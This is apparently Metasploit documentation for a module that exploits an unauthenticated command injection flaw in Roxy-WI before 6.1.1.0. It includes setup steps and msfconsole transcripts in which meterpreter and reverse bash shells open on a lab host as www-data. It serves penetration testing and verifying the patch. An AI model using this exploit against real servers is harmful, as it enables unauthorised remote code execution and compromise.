Nuri Çilengir
628f5970b1
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
3.5 KiB
Vulnerable Application
Description
This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.
Technical details about the vulnerability can be found at here. The original GitHub advisory can be found at https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532. The patch can be found at https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755
Setup
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
https://roxy-wi.org/installation.py
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/roxy_wi_exec - Set
RHOST - Set
LHOST - Run
exploit - Do:
run - You should get a shell.
- Verify that you are getting meterpreter session.
Options
Set TAGETURI if the Roxy-WI is installed at a custom path.
TARGETURI
The base path to Roxy-WI. The default value is /
Scenarios
msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Sending stage (40164 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300
[+] Exploit successfully executed.
meterpreter > pwd
/var/www/haproxy-wi/app
You can also use cmd payloads.
msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)```